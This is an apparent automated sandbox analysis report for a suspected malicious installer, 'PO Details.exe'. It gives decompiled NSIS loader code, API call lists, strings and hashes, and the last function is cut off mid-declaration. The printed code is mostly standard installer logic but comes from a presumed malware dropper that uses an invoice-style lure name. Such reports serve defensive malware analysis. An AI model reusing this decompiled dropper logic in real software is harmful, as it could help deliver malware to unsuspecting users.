							 *0x434fcc =  *0x434fcc | 0xffffffff;
							 *(_t196 + 0x14) = E00403AE0( *0x434fcc);
							goto L48;
						}
						_t174 = E00405D13(_t192, _t150);
						if(_t174 < _t192) {
							L44:
							_t235 = _t174 - _t192;
							 *(_t196 + 0x10) = L"Error launching installer";
							if(_t174 < _t192) {
								_t172 = E004059E2(_t238);
								lstrcatW(_t185, L"~nsu");
								if(_t172 != _t150) {
									lstrcatW(_t185, "A");
								}
								lstrcatW(_t185, L".tmp");
								_t194 = L"C:\\Users\\Arthur\\Desktop";
								if(lstrcmpiW(_t185, L"C:\\Users\\Arthur\\Desktop") != 0) {
									_push(_t185);
									if(_t172 == _t150) {
										E004059C5();
									} else {
										E00405948();
									}
									SetCurrentDirectoryW(_t185);
									_t242 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Susendes\\Scrumption" - _t150; // 0x43
									if(_t242 == 0) {
										E00406411(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Susendes\\Scrumption", _t194);
									}
									E00406411(0x436000,  *(_t196 + 0x18));
									_t155 = "A" & 0x0000ffff;
									 *0x436800 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
									_t195 = 0x1a;
									do {
										E0040644E(_t150, 0x42aa28, _t185, 0x42aa28,  *((intOrPtr*)( *0x434f14 + 0x120)));
										DeleteFileW(0x42aa28);
										if( *(_t196 + 0x10) != _t150 && CopyFileW(L"C:\\Users\\Arthur\\Desktop\\PO Details.exe", 0x42aa28, 1) != 0) {
											E004061D7(_t155, 0x42aa28, _t150);
											E0040644E(_t150, 0x42aa28, _t185, 0x42aa28,  *((intOrPtr*)( *0x434f14 + 0x124)));
											_t102 = E004059FA(0x42aa28);
											if(_t102 != _t150) {
												CloseHandle(_t102);
												 *(_t196 + 0x10) = _t150;
											}
										}
										 *0x436800 =  *0x436800 + 1;
										_t195 = _t195 - 1;
									} while (_t195 != 0);
									E004061D7(_t155, _t185, _t150);
								}
								goto L48;
							}
							 *_t174 = _t150;
							_t175 =  &(_t174[2]);
							if(E00405DEE(_t235,  &(_t174[2])) == 0) {
								goto L48;
							}
							E00406411(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Susendes\\Scrumption", _t175);
							E00406411(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Susendes\\Scrumption\\Bilfragmenteringsanlgs209\\Buskmndene\\Injectors\\Cunts", _t175);
							 *(_t196 + 0x10) = _t150;
							goto L47;
						}
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_t158 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
						_t119 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t163 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
						while( *_t174 != _t158 || _t174[1] != _t119) {
							_t174 = _t174;
							if(_t174 >= _t192) {
								continue;
							}
							break;
						}
						_t150 = 0;
						goto L44;
					}
					GetWindowsDirectoryW(_t185, 0x3fb);
					lstrcatW(_t185, L"\\Temp");
					_t122 = E00403494(_t154, _t224);
					_t225 = _t122;
					if(_t122 != 0) {
						goto L36;
					}
					GetTempPathW(0x3fc, _t185);
					lstrcatW(_t185, L"Low");
					SetEnvironmentVariableW(L"TEMP", _t185);
					SetEnvironmentVariableW(L"TMP", _t185);
					_t127 = E00403494(_t154, _t225);
					_t226 = _t127;
					if(_t127 == 0) {
						goto L48;
					}
					goto L36;
				} else {
					do {
						_t153 = 0x20;
						if(_t65 != _t153) {
							L13:
							if( *_t154 == 0x22) {
								_t154 = _t154 + 2;
								_t153 = 0x22;
							}
							if( *_t154 != 0x2f) {
								goto L27;
							} else {
								_t154 = _t154 + 2;
								if( *_t154 == 0x53) {
									_t147 =  *((intOrPtr*)(_t154 + 2));
									if(_t147 == 0x20 || _t147 == 0) {
										 *0x434fc0 = 1;
									}
								}
								asm("cdq");
								asm("cdq");
								_t168 = L"NCRC" & 0x0000ffff;
								asm("cdq");
								_t180 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t168;
								if( *_t154 == (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t168) &&  *((intOrPtr*)(_t154 + 4)) == _t180) {
									_t146 =  *((intOrPtr*)(_t154 + 8));
									if(_t146 == 0x20 || _t146 == 0) {
										 *(_t196 + 0x1c) =  *(_t196 + 0x1c) | 0x00000004;
									}
								}
								asm("cdq");
								asm("cdq");
								_t163 = L" /D=" & 0x0000ffff;
								asm("cdq");
								_t183 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t163;
								if( *(_t154 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t163) ||  *_t154 != _t183) {
									goto L27;
								} else {
									 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
									__eflags = _t154;
									E00406411(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Susendes\\Scrumption", _t154);
									L32:
									_t150 = 0;
									goto L33;
								}
							}
						} else {
							goto L12;
						}
						do {
							L12:
							_t154 = _t154 + 2;
						} while ( *_t154 == _t153);
						goto L13;
						L27:
						_t154 = E00405D13(_t154, _t153);
						if( *_t154 == 0x22) {
							_t154 = _t154 + 2;
						}
						_t65 =  *_t154;
					} while (_t65 != 0);
					goto L32;
				}
				L4:
				E00406796(_t184); // executed
				_t184 =  &(_t184[lstrlenA(_t184) + 1]);
				if( *_t184 != 0) {
					goto L4;
				} else {
					E00406806(0xb);
					 *0x434f04 = E00406806(9);
					_t56 = E00406806(7);
					if(_t56 != _t150) {
						_t56 =  *_t56(0x1e);
						if(_t56 != 0) {
							 *0x434f0f =  *0x434f0f | 0x00000040;
						}
					}
					goto L8;
				}
			}

0x004034d0
0x004034d1
0x004034d8
0x004034dc
0x004034e4
0x004034e8
0x004034f4
0x004034fd
0x00403502
0x00403505
0x0040350c
0x00403513
0x00403513
0x0040350c
0x00403515
0x00403515
0x0040355d
0x0040355e
0x00403565
0x0040356b
0x00403581
0x00403591
0x00403596
0x0040359c
0x004035a3
0x004035b0
0x004035ba
0x004035bc
0x004035c0
0x004035c5
0x004035c5
0x004035d4
0x004035d6
0x004035da
0x004035e0
0x004036f7
0x004036fd
0x00403708
0x0040370a
0x0040370f
0x00403711
0x00403769
0x0040376e
0x00403778
0x0040377f
0x00403783
0x00403834
0x00403834
0x00403839
0x0040383f
0x00403844
0x0040396a
0x00403970
0x004039ee
0x004039ee
0x004039f3
0x004039f6
0x004039f8
0x004039f8
0x00403a00
0x00403a00
0x00403980
0x00403986
0x00403988
0x00403995
0x004039a8
0x004039b0
0x004039b8
0x004039b8
0x004039c0
0x004039c5
0x004039cc
0x004039da
0x004039dd
0x004039e3
0x004039e5
0x00000000
0x00000000
0x00000000
0x004039ce
0x004039d4
0x004039d6
0x004039d8
0x004039e7
0x004039e9
0x00000000
0x004039e9
0x00000000
0x004039d8
0x004039cc
0x00403853
0x0040385a
0x0040385a
0x0040378f
0x00403824
0x00403824
0x00403830
0x00000000
0x00403830
0x0040379c
0x004037a0
0x004037ee
0x004037ee
0x004037f0
0x004037f8
0x0040386b
0x0040386d
0x00403874
0x0040387c
0x0040387c
0x00403887
0x0040388c
0x0040389b
0x0040389f
0x004038a0
0x004038a9
0x004038a2
0x004038a2
0x004038a2
0x004038af
0x004038b5
0x004038bc
0x004038c4
0x004038c4
0x004038d2
0x004038de
0x004038ec
0x004038f1
0x004038f7
0x00403903
0x00403909
0x00403913
0x00403929
0x0040393a
0x00403940
0x00403947
0x0040394a
0x00403950
0x00403950
0x00403947
0x00403954
0x0040395b
0x0040395b
0x00403960
0x00403960
0x00000000
0x0040389b
0x004037fa
0x004037fd
0x00403808
0x00000000
0x00000000
0x00403810
0x0040381b
0x00403820
0x00000000
0x00403820
0x004037a9
0x004037c1
0x004037d2
0x004037d3
0x004037d7
0x004037d9
0x004037e7
0x004037ea
0x00000000
0x00000000
0x00000000
0x004037ea
0x004037ec
0x00000000
0x004037ec
0x00403719
0x00403725
0x0040372a
0x0040372f
0x00403731
0x00000000
0x00000000
0x00403739
0x00403741
0x00403752
0x0040375a
0x0040375c
0x00403761
0x00403763
0x00000000
0x00000000
0x00000000
0x004035e6
0x004035e6
0x004035e8
0x004035ec
0x004035f5
0x004035f9
0x004035fe
0x004035ff
0x004035ff
0x00403604
0x00000000
0x0040360a
0x0040360b
0x00403610
0x00403612
0x0040361a
0x00403621
0x00403621
0x0040361a
0x00403632
0x00403645
0x00403646
0x0040365b
0x00403660
0x00403664
0x0040366d
0x00403675
0x0040367c
0x0040367c
0x00403675
0x00403688
0x0040369b
0x0040369c
0x004036b1
0x004036b7
0x004036bb
0x00000000
0x004036e2
0x004036e2
0x004036e7
0x004036f0
0x004036f5
0x004036f5
0x00000000
0x004036f5
0x004036bb
0x00000000
0x00000000
0x00000000
0x004035ee
0x004035ee
0x004035ef
0x004035f0
0x00000000
0x004036c3
0x004036ca
0x004036d0
0x004036d3
0x004036d3
0x004036d4
0x004036d7
0x00000000
0x004036e0
0x0040351a
0x0040351b
0x00403527
0x0040352e
0x00000000
0x00403530
0x00403532
0x00403540
0x00403545
0x0040354c
0x00403550
0x00403554
0x00403556
0x00403556
0x00403554
0x00000000
0x0040354c

APIs

SetErrorMode.KERNELBASE ref: 004034E8
GetVersion.KERNEL32 ref: 004034EE
lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403521
#17.COMCTL32(?,00000007,00000009,0000000B), ref: 0040355E
OleInitialize.OLE32(00000000), ref: 00403565
SHGetFileInfoW.SHELL32(0042B228,00000000,?,000002B4,00000000), ref: 00403581
GetCommandLineW.KERNEL32(00433F00,NSIS Error,?,00000007,00000009,0000000B), ref: 00403596
CharNextW.USER32(00000000,"C:\Users\user\Desktop\PO Details.exe" ,00000020,"C:\Users\user\Desktop\PO Details.exe" ,00000000,?,00000007,00000009,0000000B), ref: 004035CE

Part of subcall function 00406806: GetModuleHandleA.KERNEL32(?,00000020,?,00403537,0000000B), ref: 00406818
Part of subcall function 00406806: GetProcAddress.KERNEL32(00000000,?), ref: 00406833

GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 00403708
GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 00403719
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403725
GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403739
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 00403741
SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 00403752
SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 0040375A
DeleteFileW.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 0040376E

Part of subcall function 00406411: lstrcpynW.KERNEL32(?,?,00000400,00403596,00433F00,NSIS Error,?,00000007,00000009,0000000B), ref: 0040641E

OleUninitialize.OLE32(00000007,?,00000007,00000009,0000000B), ref: 00403839
ExitProcess.KERNEL32 ref: 0040385A
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 0040386D
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 0040387C
lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403887
lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\PO Details.exe" ,00000000,00000007,?,00000007,00000009,0000000B), ref: 00403893
SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 004038AF
DeleteFileW.KERNEL32(0042AA28,0042AA28,?,00436000,00000009,?,00000007,00000009,0000000B), ref: 00403909
CopyFileW.KERNEL32(C:\Users\user\Desktop\PO Details.exe,0042AA28,00000001,?,00000007,00000009,0000000B), ref: 0040391D
CloseHandle.KERNEL32(00000000,0042AA28,0042AA28,?,0042AA28,00000000,?,00000007,00000009,0000000B), ref: 0040394A
GetCurrentProcess.KERNEL32(00000028,0000000B,00000007,00000009,0000000B), ref: 00403979
OpenProcessToken.ADVAPI32(00000000), ref: 00403980
LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403995
AdjustTokenPrivileges.ADVAPI32 ref: 004039B8
ExitWindowsEx.USER32(00000002,80040002), ref: 004039DD
ExitProcess.KERNEL32 ref: 00403A00

Strings

Low, xrefs: 0040373B
UXTHEME, xrefs: 00403515, 0040351A, 00403520
C:\Users\user\AppData\Local\Temp\Susendes\Scrumption, xrefs: 004036EB, 0040380B, 004038B5, 004038BF
SeShutdownPrivilege, xrefs: 0040398F
\Temp, xrefs: 0040371F
"C:\Users\user\Desktop\PO Details.exe" , xrefs: 0040359C, 004035A2, 00403796
Error launching installer, xrefs: 004037F0
NSIS Error, xrefs: 00403587
TEMP, xrefs: 0040374D
~nsu, xrefs: 00403865
C:\Users\user\AppData\Local\Temp\, xrefs: 004036FD, 00403702, 00403718, 00403724, 00403733, 00403740, 0040374C, 00403754, 0040386A, 0040387B, 00403886, 00403892, 0040389F, 004038AE, 0040395F
1033, xrefs: 00403769
C:\Users\user\AppData\Local\Temp\Susendes\Scrumption\Bilfragmenteringsanlgs209\Buskmndene\Injectors\Cunts, xrefs: 00403816
C:\Users\user\Desktop, xrefs: 0040388C, 00403891, 004038BE
C:\Users\user\Desktop\PO Details.exe, xrefs: 00403918
TMP, xrefs: 00403755
.tmp, xrefs: 00403881

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: lstrcat$FileProcess$Exit$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
String ID: "C:\Users\user\Desktop\PO Details.exe" $.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Susendes\Scrumption$C:\Users\user\AppData\Local\Temp\Susendes\Scrumption\Bilfragmenteringsanlgs209\Buskmndene\Injectors\Cunts$C:\Users\user\Desktop$C:\Users\user\Desktop\PO Details.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
API String ID: 3441113951-3906269442
Opcode ID: 57a9a2dd428d2fdd19cbdf93519aac93b81e27b25fad92e5b66dcc7ddb2898c7
Instruction ID: 633452ec6b1f102921f1489b21fe302f429ce1b90f1906ff0e0a9b5b291269fb
Opcode Fuzzy Hash: 57a9a2dd428d2fdd19cbdf93519aac93b81e27b25fad92e5b66dcc7ddb2898c7
Instruction Fuzzy Hash: 7DD12671600311ABE7207F659D45B3B3AACEB8070AF11443FF581B62D1DBBD89518B6E

Uniqueness

Uniqueness Score: -1.00%

Function 004055B8 Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 284
windowclipboardmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E004055B8(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t94;
				long _t95;
				int _t100;
				int _t101;
				long _t104;
				void* _t108;
				intOrPtr _t119;
				void* _t127;
				intOrPtr _t130;
				struct HWND__* _t134;
				int _t156;
				int _t159;
				struct HMENU__* _t164;
				struct HWND__* _t168;
				struct HWND__* _t169;
				int _t171;
				void* _t172;
				short* _t173;
				short* _t175;
				int _t177;

				_t169 =  *0x433ee4; // 0x10392
				_t156 = 0;
				_v8 = _t169;
				if(_a8 != 0x110) {
					__eflags = _a8 - 0x405;
					if(_a8 == 0x405) {
						_t127 = CreateThread(0, 0, E0040554C, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
						CloseHandle(_t127); // executed
					}
					__eflags = _a8 - 0x111;
					if(_a8 != 0x111) {
						L17:
						_t171 = 1;
						__eflags = _a8 - 0x404;
						if(_a8 != 0x404) {
							L25:
							__eflags = _a8 - 0x7b;
							if(_a8 != 0x7b) {
								goto L20;
							}
							_t94 = _v8;
							__eflags = _a12 - _t94;
							if(_a12 != _t94) {
								goto L20;
							}
							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
							__eflags = _t95 - _t156;
							_a8 = _t95;
							if(_t95 <= _t156) {
								L36:
								return 0;
							}
							_t164 = CreatePopupMenu();
							AppendMenuW(_t164, _t156, _t171, E0040644E(_t156, _t164, _t171, _t156, 0xffffffe1));
							_t100 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t159 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v28);
								_t100 = _v28.left;
								_t159 = _v28.top;
							}
							_t101 = TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156);
							__eflags = _t101 - _t171;
							if(_t101 == _t171) {
								_v60 = _t156;
								_v48 = 0x42d268;
								_v44 = 0x1000;
								_a4 = _a8;
								do {
									_a4 = _a4 - 1;
									_t104 = SendMessageW(_v8, 0x1073, _a4,  &_v68);
									__eflags = _a4 - _t156;
									_t171 = _t171 + _t104 + 2;
								} while (_a4 != _t156);
								OpenClipboard(_t156);
								EmptyClipboard();
								_t108 = GlobalAlloc(0x42, _t171 + _t171);
								_a4 = _t108;
								_t172 = GlobalLock(_t108);
								do {
									_v48 = _t172;
									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
									 *_t173 = 0xd;
									_t175 = _t173 + 2;
									 *_t175 = 0xa;
									_t172 = _t175 + 2;
									_t156 = _t156 + 1;
									__eflags = _t156 - _a8;
								} while (_t156 < _a8);
								GlobalUnlock(_a4);
								SetClipboardData(0xd, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x433ecc - _t156; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x434f08, 8);
							__eflags =  *0x434fac - _t156;
							if( *0x434fac == _t156) {
								_t119 =  *0x42c240; // 0x7acc34
								_t57 = _t119 + 0x34; // 0xffffffd5
								E00405479( *_t57, _t156);
							}
							E00404340(_t171);
							goto L25;
						}
						 *0x42ba38 = 2;
						E00404340(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E004043CE(_a8, _a12, _a16);
						}
						ShowWindow( *0x433ed0, _t156);
						ShowWindow(_t169, 8);
						E0040439C(_t169);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_t177 = 2;
				_v60 = _t177;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t130 =  *0x434f14;
				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
				_a12 =  *((intOrPtr*)(_t130 + 0x60));
				 *0x433ed0 = GetDlgItem(_a4, 0x403);
				 *0x433ec8 = GetDlgItem(_a4, 0x3ee);
				_t134 = GetDlgItem(_a4, 0x3f8);
				 *0x433ee4 = _t134;
				_v8 = _t134;
				E0040439C( *0x433ed0);
				 *0x433ed4 = E00404CF5(4);
				 *0x433eec = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(_t177);
				SendMessageW(_v8, 0x1061, 0,  &_v60); // executed
				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
				if(_a8 >= 0) {
					SendMessageW(_v8, 0x1001, 0, _a8);
					SendMessageW(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t156) {
					SendMessageW(_v8, 0x1024, _t156, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00404367(_a4);
				if(( *0x434f1c & 0x00000003) != 0) {
					ShowWindow( *0x433ed0, _t156);
					if(( *0x434f1c & 0x00000002) != 0) {
						 *0x433ed0 = _t156;
					} else {
						ShowWindow(_v8, 8);
					}
					E0040439C( *0x433ec8);
				}
				_t168 = GetDlgItem(_a4, 0x3ec);
				SendMessageW(_t168, 0x401, _t156, 0x75300000);
				if(( *0x434f1c & 0x00000004) != 0) {
					SendMessageW(_t168, 0x409, _t156, _a12);
					SendMessageW(_t168, 0x2001, _t156, _a8);
				}
				goto L36;
			}

0x004055c0
0x004055c6
0x004055d0
0x004055d3
0x00405762
0x00405769
0x00405786
0x0040578d
0x0040578d
0x00405793
0x004057a0
0x004057be
0x004057c0
0x004057c1
0x004057c8
0x0040581e
0x0040581e
0x00405822
0x00000000
0x00000000
0x00405824
0x00405827
0x0040582a
0x00000000
0x00000000
0x00405834
0x0040583a
0x0040583c
0x0040583f
0x00405941
0x00000000
0x00405941
0x0040584e
0x00405859
0x00405862
0x00405869
0x0040586d
0x00405870
0x00405879
0x0040587f
0x00405882
0x00405882
0x00405892
0x00405898
0x0040589a
0x004058a3
0x004058a6
0x004058ad
0x004058b4
0x004058bc
0x004058bc
0x004058ca
0x004058d0
0x004058d3
0x004058d3
0x004058da
0x004058e0
0x004058ec
0x004058f3
0x004058fc
0x004058fe
0x00405901
0x00405910
0x00405913
0x00405919
0x0040591a
0x00405920
0x00405921
0x00405922
0x00405922
0x0040592a
0x00405935
0x0040593b
0x0040593b
0x00000000
0x0040589a
0x004057ca
0x004057d0
0x00405800
0x00405802
0x00405808
0x0040580a
0x00405810
0x00405813
0x00405813
0x00405819
0x00000000
0x00405819
0x004057d4
0x004057de
0x00000000
0x004057a2
0x004057a2
0x004057a8
0x004057e3
0x00000000
0x004057ec
0x004057b1
0x004057b6
0x004057b9
0x00000000
0x004057b9
0x004057a0
0x004055d9
0x004055dd
0x004055e5
0x004055e9
0x004055ec
0x004055ef
0x004055f2
0x004055f5
0x004055f6
0x004055f7
0x00405610
0x00405613
0x0040561d
0x0040562c
0x00405634
0x0040563c
0x00405641
0x00405644
0x00405650
0x00405659
0x00405662
0x00405684
0x0040568a
0x0040569b
0x004056a0
0x004056ae
0x004056bc
0x004056bc
0x004056c1
0x004056cf
0x004056cf
0x004056d4
0x004056d7
0x004056dc
0x004056e8
0x004056f1
0x004056fe
0x0040570d
0x00405700
0x00405705
0x00405705
0x00405719
0x00405719
0x0040572d
0x00405736
0x0040573f
0x0040574f
0x0040575b
0x0040575b
0x00000000

APIs

GetDlgItem.USER32(?,00000403), ref: 00405616
GetDlgItem.USER32(?,000003EE), ref: 00405625
GetClientRect.USER32(?,?), ref: 00405662
GetSystemMetrics.USER32(00000002), ref: 00405669
SendMessageW.USER32(?,00001061,00000000,?), ref: 0040568A
SendMessageW.USER32(?,00001036,00004000,00004000), ref: 0040569B
SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004056AE
SendMessageW.USER32(?,00001026,00000000,00000110), ref: 004056BC
SendMessageW.USER32(?,00001024,00000000,?), ref: 004056CF
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056F1
ShowWindow.USER32(?,00000008), ref: 00405705
GetDlgItem.USER32(?,000003EC), ref: 00405726
SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405736
SendMessageW.USER32(00000000,00000409,00000000,?), ref: 0040574F
SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 0040575B
GetDlgItem.USER32(?,000003F8), ref: 00405634

Part of subcall function 0040439C: SendMessageW.USER32(00000028,?,00000001,004041C7), ref: 004043AA

GetDlgItem.USER32(?,000003EC), ref: 00405778
CreateThread.KERNEL32(00000000,00000000,Function_0000554C,00000000), ref: 00405786
CloseHandle.KERNELBASE(00000000), ref: 0040578D
ShowWindow.USER32(00000000), ref: 004057B1
ShowWindow.USER32(00010392,00000008), ref: 004057B6
ShowWindow.USER32(00000008), ref: 00405800
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405834
CreatePopupMenu.USER32 ref: 00405845
AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405859
GetWindowRect.USER32(?,?), ref: 00405879
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405892
SendMessageW.USER32(?,00001073,00000000,?), ref: 004058CA
OpenClipboard.USER32(00000000), ref: 004058DA
EmptyClipboard.USER32 ref: 004058E0
GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058EC
GlobalLock.KERNEL32(00000000), ref: 004058F6
SendMessageW.USER32(?,00001073,00000000,?), ref: 0040590A
GlobalUnlock.KERNEL32(00000000), ref: 0040592A
SetClipboardData.USER32(0000000D,00000000), ref: 00405935
CloseClipboard.USER32 ref: 0040593B

Strings

{, xrefs: 0040581E

Memory Dump Source

Source File: 00000001.00000002.9296505845.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.9296454667.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296594572.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296907529.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9296956494.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297023788.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297074741.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297168424.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.9297228468.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_PO Details.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: f0fd2e1a1f6109bd428cca54ea167e09023d8e4ecaec3e055b9f768bc27e185c
Instruction ID: ef42e6e7ad26681d1de71b6013131fdd69d98400fc0f56e042e978cac442fd71
Opcode Fuzzy Hash: f0fd2e1a1f6109bd428cca54ea167e09023d8e4ecaec3e055b9f768bc27e185c
Instruction Fuzzy Hash: 45B138B1900608FFDB11AFA0DE85AAE7B79FB44355F00803AFA41B61A0CB755E51DF68

Uniqueness

Uniqueness Score: -1.00%

Function 6E491B5F Relevance: 20.1, APIs: 13, Instructions: 597
stringlibrarymemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E6E491B5F() {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				WCHAR* _v24;
				WCHAR* _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				WCHAR* _v48;
				signed int _v52;
				void* _v56;
				intOrPtr _v60;
				WCHAR* _t208;
				signed int _t211;
				void* _t213;
				void* _t215;
				WCHAR* _t217;
				void* _t225;
				struct HINSTANCE__* _t226;
				struct HINSTANCE__* _t227;
				struct HINSTANCE__* _t229;
				signed short _t231;
				struct HINSTANCE__* _t234;
				struct HINSTANCE__* _t236;
				void* _t237;
				intOrPtr* _t238;
				void* _t249;
				signed char _t250;
				signed int _t251;
				void* _t255;
				struct HINSTANCE__* _t257;
				void* _t258;
				signed int _t260;
				signed int _t261;
				signed short* _t264;
				signed int _t269;
				signed int _t272;
				signed int _t274;
				void* _t277;
				void* _t281;
				struct HINSTANCE__* _t283;
				signed int _t286;
				void _t287;
				signed int _t288;
				signed int _t300;
				signed int _t301;
				signed short _t304;
				void* _t305;
				signed int _t309;
				signed int _t312;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed short* _t321;
				WCHAR* _t322;
				WCHAR* _t324;
				WCHAR* _t325;
				struct HINSTANCE__* _t326;
				void* _t328;
				signed int _t331;
				void* _t332;

				_t283 = 0;
				_v32 = 0;
				_v36 = 0;
